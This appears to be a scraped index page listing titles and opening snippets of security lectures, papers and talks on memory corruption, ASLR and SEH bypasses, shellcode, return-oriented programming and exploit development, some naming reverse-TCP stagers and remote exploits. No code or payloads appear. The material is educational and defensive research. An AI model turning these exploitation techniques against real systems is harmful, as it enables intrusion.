Monthly Research Understanding bypassing ASLR by a pointer at a fixed address FFRI,Inc. http://www.ffri.jp Ver 2.00.01 1 MS13-063 Security patch published by Microsoft in Aug 2013 Includes a fix for ALSR
More informationBLACKBERRY PWNAGE THE BLUEJAY STRIKES
BLACKBERRY PWNAGE THE BLUEJAY STRIKES Federico Muttis Core Security Technologies Session ID: HTA-T19 Session Classification: Advanced INFO @ THE MEDIA http://www.zdnet.com/blog/security/pwn2own-2011-blackberry-falls-to-webkit-browser-attack/8401
More informationHow to Impress Girls with Browser Memory Protection Bypasses
How to Impress Girls with Browser Memory Protection Bypasses Mark Dowd & Alexander Sotirov markdowd@au1.ibm.com alex@sotirov.net Setting back browser security by 10 years Part I: Introduction Introduction
More informationSecurity Workshop HTS. LSE Team. February 3rd, 2016 EPITA / 40
Security Workshop HTS LSE Team EPITA 2018 February 3rd, 2016 1 / 40 Introduction What is this talk about? Presentation of some basic memory corruption bugs Presentation of some simple protections Writing
More informationThe IA-32 Stack and Function Calls. CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta
1 The IA-32 Stack and Function Calls CS4379/5375 Software Reverse Engineering Dr. Jaime C. Acosta 2 Important Registers used with the Stack EIP: ESP: EBP: 3 Important Registers used with the Stack EIP:
More informationCVE EXPLOIT USING 108 BYTES AND DOWNLOADING A FILE WITH YOUR UNLIMITED CODE BY VALTHEK
CVE-2017-11882 EXPLOIT USING 108 BYTES AND DOWNLOADING A FILE WITH YOUR UNLIMITED CODE BY VALTHEK First words of thank to Embedy Company to discover the initial exploit and POC of 44 bytes máximum, Ridter
More informationBeyond Stack Smashing: Recent Advances in Exploiting. Jonathan Pincus(MSR) and Brandon Baker (MS)
Beyond Stack Smashing: Recent Advances in Exploiting Buffer Overruns Jonathan Pincus(MSR) and Brandon Baker (MS) Buffer Overflows and How they Occur Buffer is a contiguous segment of memory of a fixed
More informationAutodesk AutoCAD DWG-AC1021 Heap Corruption
security research Autodesk AutoCAD DWG-AC1021 Heap Corruption Mar 2013 AutoCAD is a software for computer-aided design (CAD) and technical drawing in 2D/3D, being one of the worlds leading CAD design tools.
More informationArchitecture-level Security Vulnerabilities
Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:
More informationT Using debuggers to analyze malware. Antti Tikkanen, F-Secure Corporation
T-110.6220 Using debuggers to analyze malware Antti Tikkanen, F-Secure Corporation Agenda Debugger basics Introduction Scenarios and tools How do debuggers work? Debug API The debugging loop Underlying
More informationSYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14
SYSTEM CALL IMPLEMENTATION CS124 Operating Systems Fall 2017-2018, Lecture 14 2 User Processes and System Calls Previously stated that user applications interact with the kernel via system calls Typically
More informationCNIT 127: Exploit Development. Ch 3: Shellcode. Updated
CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing
More informationIs Exploitation Over? Bypassing Memory Protections in Windows 7
Is Exploitation Over? Bypassing Memory Protections in Windows 7 Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Published research into reliable exploitation techniques: Heap
More informationFunction Call Convention
Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout
More informationExploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it
Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier
More informationIs stack overflow still a problem?
Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains
More informationin memory: an evolution of attacks Mathias Payer Purdue University
in memory: an evolution of attacks Mathias Payer Purdue University Images (c) MGM, WarGames, 1983 Memory attacks: an ongoing war Vulnerability classes according to CVE Memory
More informationExploits and gdb. Tutorial 5
Exploits and gdb Tutorial 5 Exploits and gdb 1. Buffer Vulnerabilities 2. Code Injection 3. Integer Attacks 4. Advanced Exploitation 5. GNU Debugger (gdb) Buffer Vulnerabilities Basic Idea Overflow or
More informationBUFFER OVERFLOW DEFENSES & COUNTERMEASURES
BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess
More informationAbout unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos
July 16, 2016 1/45 Whoami RE, vulnerability research LSE 2015 Sogeti since 2/45 1 2 Reverse Exploitation 3 4 3/45 Agenda 1 4/45 Agenda 1 5/45 Unified Extended FIrmware is based on EFI Specification for
More informationString Oriented Programming Exploring Format String Attacks. Mathias Payer
String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:
More informationPlay with FILE Structure Yet Another Binary Exploitation Technique. Abstract
Play with FILE Structure Yet Another Binary Exploitation Technique An-Jie Yang (Angelboy) angelboy@chroot.org Abstract To fight against prevalent cyber threat, more mechanisms to protect operating systems
More informationLecture 09 Code reuse attacks. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017
Lecture 09 Code reuse attacks Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Last time No good reason for stack/heap/static data to be executable No good reason for code to be writable
More informationWriting your first windows exploit in less than one hour
Writing your first windows exploit in less than one hour Klaus Gebeshuber klaus.gebeshuber@fh-joanneum.at http://www.fh-joanneum.at/ims AGENDA Workshop 10.00 13.00 Memory & stack basics, function calling
More informationCSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko
CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization
More informationU23 - Binary Exploitation
U23 - Binary Exploitation Stratum Auhuur robbje@aachen.ccc.de November 21, 2016 Context OS: Linux Context OS: Linux CPU: x86 (32 bit) Context OS: Linux CPU: x86 (32 bit) Address Space Layout Randomization:
More informationSmashing the Buffer. Miroslav Štampar
Smashing the Buffer Miroslav Štampar (mstampar@zsis.hr) Summary BSidesVienna 2014, Vienna (Austria) November 22nd, 2014 2 Buffer overflow (a.k.a.) Buffer overrun An anomaly where a program, while writing
More informationCSC 591 Systems Attacks and Defenses Stack Canaries & ASLR
CSC 591 Systems Attacks and Defenses Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer
More informationCSC 405 Computer Security Stack Canaries & ASLR
CSC 405 Computer Security Stack Canaries & ASLR Alexandros Kapravelos akaprav@ncsu.edu How can we prevent a buffer overflow? Check bounds Programmer Language Stack canaries [...more ] Buffer overflow defenses
More informationProtecting Against Unexpected System Calls
Protecting Against Unexpected System Calls C. M. Linn, M. Rajagopalan, S. Baker, C. Collberg, S. K. Debray, J. H. Hartman Department of Computer Science University of Arizona Presented By: Mohamed Hassan
More informationIdentifying Memory Corruption Bugs with Compiler Instrumentations. 이병영 ( 조지아공과대학교
Identifying Memory Corruption Bugs with Compiler Instrumentations 이병영 ( 조지아공과대학교 ) blee@gatech.edu @POC2014 How to find bugs Source code auditing Fuzzing Source Code Auditing Focusing on specific vulnerability
More informationLeveraging CVE for ASLR Bypass & RCE. Gal De Leon & Nadav Markus
Leveraging CVE-2015-7547 for ASLR Bypass & RCE Gal De Leon & Nadav Markus 1 Who We Are Nadav Markus, Gal De-Leon Security researchers @ PaloAltoNetworks Vulnerability research and exploitation Reverse
More informationUniversità Ca Foscari Venezia
Stack Overflow Security 1 2018-19 Università Ca Foscari Venezia www.dais.unive.it/~focardi secgroup.dais.unive.it Introduction Buffer overflow is due to careless programming in unsafe languages like C
More informationArchitecture-level Security Vulnerabilities. Julian Stecklina
Architecture-level Security Vulnerabilities Julian Stecklina Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The
More informationCSE 227 Computer Security Spring 2010 S f o t ftware D f e enses I Ste St f e an f Sa v Sa a v g a e g
CSE 227 Computer Security Spring 2010 Software Df Defenses I Stefan Savage Kinds of defenses Eliminate violation of runtime model Better languages, code analysis Don t allow bad input Input validation
More informationNetWare Kernel Stack Overflow Exploitation.
NetWare Kernel Stack Overflow Exploitation npouvesle@tenablesecurity.com Agenda Introduction NetWare Debugger Kernel mode stager: reverse tcp Kernel mode Stages Connect back shellcode Add user Conclusion
More informationAssembly Language: Function Calls
Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and returning Passing parameters Storing local variables Handling registers without interference
More informationSEH overwrite and its exploitability. Shuichiro Suzuki Fourteenforty Research Institute Inc. Research Engineer
SEH overwrite and its exploitability Shuichiro Suzuki Fourteenforty Research Institute Inc. Research Engineer Agenda Theme and Goal Review of SEH overwrites Protection mechanisms for SEH overwrites Bypassing
More informationWriting Exploits with MSF3.0
Writing Exploits with MSF3.0 Saumil Shah hack.lu 2007 Luxembourg, October 18 2007 Setup and Instructions VMWare Player if you don t have VMWare Workstation Copy VM Image from CD, unzip the ZIP file Administrator
More informationBuffer overflow is still one of the most common vulnerabilities being discovered and exploited in commodity software.
Outline Morris Worm (1998) Infamous attacks Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 23rd January 2014 Recap Simple overflow exploit
More informationCS165 Computer Security. Understanding low-level program execution Oct 1 st, 2015
CS165 Computer Security Understanding low-level program execution Oct 1 st, 2015 A computer lets you make more mistakes faster than any invention in human history - with the possible exceptions of handguns
More informationOverview REWARDS TIE HOWARD Summary CS 6V Data Structure Reverse Engineering. Zhiqiang Lin
CS 6V81-05 Data Structure Reverse Engineering Zhiqiang Lin Department of Computer Science The University of Texas at Dallas September 2 nd, 2011 Outline 1 Overview 2 REWARDS 3 TIE 4 HOWARD 5 Summary Outline
More informationBuffer Overflows Defending against arbitrary code insertion and execution
www.harmonysecurity.com info@harmonysecurity.com Buffer Overflows Defending against arbitrary code insertion and execution By Stephen Fewer Contents 1 Introduction 2 1.1 Where does the problem lie? 2 1.1.1
More informationJust-in-Time Code Reuse
Just-in-Time Code Reuse The more things change, the more they stay the same Kevin Z. Snow 1 Luca Davi 2 & A. Dmitrienko 2 C. Liebchen 2 F. Monrose 1 A.-R. Sadeghi 2 1 Department of Computer Science University
More informationBypassing Mitigations by Attacking JIT Server in Microsoft Edge
Bypassing Mitigations by Attacking JIT Server in Microsoft Edge Ivan Fratric Infiltrate 2018 About me Security researcher at Google Project Zero Previously: Google Security Team, Academia (UNIZG) Doing
More informationTriggering Deep Vulnerabilities Using Symbolic Execution
Triggering Deep Vulnerabilities Using Symbolic Execution Dan Caselden, Alex Bazhanyuk, Mathias Payer, Stephen McCamant, Dawn Song, and many other awesome researchers, coders, and reverse engineers in the
More informationPolishing Chrome for Fun and Profit
Polishing Chrome for Fun and Profit Nils & Jon 29/08/2013 Labs.mwrinfosecurity.com MWR Labs 1 Labs.mwrinfosecurity.com MWR Labs Agenda Introduction Google Chrome Pwn2Own Vulnerabilities Demo Labs.mwrinfosecurity.com
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and returning" Passing parameters" Storing local variables" Handling registers without interference"
More informationFrom Assembly to JavaScript and Back
From Assembly to JavaScript and Back Robert Gawlik Ruhr-University Bochum August 30th 2018 Singapore About me IT Security since 2010 PostDoc Systems Security Group @ Horst Görtz Institute / Ruhr-University
More informationDocumentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
Documentation for exploit entitled nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit about a generic way to exploit Linux targets written by Kingcope Introduction In May 2013 a security advisory was announced
More informationProcesses (Intro) Yannis Smaragdakis, U. Athens
Processes (Intro) Yannis Smaragdakis, U. Athens Process: CPU Virtualization Process = Program, instantiated has memory, code, current state What kind of memory do we have? registers + address space Let's
More informationBypassing SEHOP. Stéfan Le Berre Damien Cauquil
Bypassing SEHOP Stéfan Le Berre s.leberre@sysdream.com Damien Cauquil d.cauquil@sysdream.com Table of contents 0. Introduction...3 1. SEHOP specifications (short version)...3 2. Dealing with SEHOP when
More informationChangelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part
1 Changelog 1 Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part OVER questions? 2 last time 3 memory management problems
More informationCMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING
CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING LECTURE 16, SPRING 2013 TOPICS TODAY Project 6 Perils & Pitfalls of Memory Allocation C Function Call Conventions in Assembly Language PERILS
More informationSA30285 / CVE
Generated by Secunia 17 December, 2008 6 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 5 Characteristics 6 Tested Versions 6 Fixed Versions 6 References 6 Generated by Secunia
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and urning" Passing parameters" Storing local variables" Handling registers without interference"
More informationThe Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
More informationUSING EMET TO DISABLE EMET
USING EMET TO DISABLE EMET USING EMET TO DISABLE EMET Presented by Abdulellah Alsaheel, Consultant Raghav Pande, Research Scientist Abdulellah Alsaheel Consultant at Mandiant (A FireEye Company) Saudi
More informationReverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher
Reverse Engineering II: Basics Gergely Erdélyi Senior Antivirus Researcher Agenda Very basics Intel x86 crash course Basics of C Binary Numbers Binary Numbers 1 Binary Numbers 1 0 1 1 Binary Numbers 1
More informationI Control Your Code Attack Vectors through the Eyes of Software-based Fault Isolation. Mathias Payer
I Control Your Code Attack Vectors through the Eyes of Software-based Fault Isolation Mathias Payer Motivation Current exploits are powerful because Applications run on coarse-grained
More informationAssembly Language: Function Calls. Goals of this Lecture. Function Call Problems
Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and urning Passing parameters Storing local variables Handling registers without interference Returning
More informationDEEP HOOKS MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS. Yarden Assaf
DEEP HOOKS MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS Assaf Carlsbad @assaf_carlsbad Yarden Shafir @yarden_shafir Yarden I started dancing at the age of 7 and later competed with a rhythmic gymnastics
More informationProgram Exploitation Intro
Program Exploitation Intro x86 Assembly 04//2018 Security 1 Univeristà Ca Foscari, Venezia What is Program Exploitation "Making a program do something unexpected and not planned" The right bugs can be
More informationEthical Hacking: Preventing & Writing Buffer Overflow Exploits
Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Rochester Security Summit 2014 Rochester OWASP Chapter Lead Ralph Durkee - Durkee Consulting, Inc. info@rd1.net Ralph Durkee Background Founder
More informationSoftware Security II: Memory Errors - Attacks & Defenses
1 Software Security II: Memory Errors - Attacks & Defenses Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab1 Writeup 3 Buffer overflow Out-of-bound memory writes (mostly sequential) Allow
More informationCYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge
CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun This lecture: [Seacord]: Chapter 3 Readings 2 Outline Secure Coding Topics String management
More informationCS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE
CS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE The purpose of this exercise is to learn Intel assembly language by disassembling a small piece of code and extensively commenting the resulting instructions.
More informationNever Let Your Guard Down: Finding Unguarded Gates to Bypass Control Flow Guard with Big Data
Never Let Your Guard Down: Finding Unguarded Gates to Bypass Control Flow Guard with Big Data Ke Sun Ya Ou Yanhui Zhao Xiaomin Song Xiaoning Li wildsator@gmail.com perfectno2015@gmail.com wildyz.yky@gmail.com
More informationVivisection of an Exploit: What To Do When It Isn't Easy. Dave Aitel Immunity, Inc
Vivisection of an Exploit: What To Do When It Isn't Easy Dave Aitel Immunity, Inc http://www.immunitysec.com Who am I? Founder, Immunity, Inc. NYC based consulting and products company CANVAS: Exploitation
More informationIsomeron: Code Randomization Resilient to (Just-In-Time) Return-Oriented Programming
Isomeron: Code Randomization Resilient to (Just-In-Time) Return-Oriented Programming Lucas Davi, Christopher Liebchen, Ahmad-Reza Sadeghi CASED/Technische Universität Darmstadt, Germany Email: {lucas.davi,christopher.liebchen,
More informationShellcode Analysis. Chapter 19
Shellcode Analysis Chapter 19 What is Shellcode Shellcode a payload of raw executable code, attackers use this code to obtain interactive shell access. A binary chunk of data Can be generally referred
More informationControl Hijacking Attacks
Control Hijacking Attacks Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides from Chris Kruegel) Attacker s mindset Take control of the victim s machine Hijack the execution flow of a running
More informationRoadmap: Security in the software lifecycle. Memory corruption vulnerabilities
Secure Programming Lecture 3: Memory Corruption I (introduction) David Aspinall, Informatics @ Edinburgh 24th January 2019 Roadmap: Security in the software lifecycle Security is considered at different
More informationCSC369 Lecture 2. Larry Zhang, September 21, 2015
CSC369 Lecture 2 Larry Zhang, September 21, 2015 1 Volunteer note-taker needed by accessibility service see announcement on Piazza for details 2 Change to office hour to resolve conflict with CSC373 lecture
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationSecure Coding Topics. Readings. CYSE 411/AIT681 Secure Software Engineering. Pointer Subterfuge. Outline. Data Locations (cont d) Data Locations
This lecture: [Seacord]: Chapter 3 Readings CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun 2 Outline Secure Coding Topics String management
More informationSecure Coding Topics. CYSE 411/AIT681 Secure Software Engineering. Readings. Outline. This lecture: Topic #8. Secure Coding: Pointer Subterfuge
CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun This lecture: [Seacord]: Chapter 3 Readings 2 Outline Secure Coding Topics String management
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationSecure Programming Lecture 3: Memory Corruption I (Stack Overflows)
Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes
More information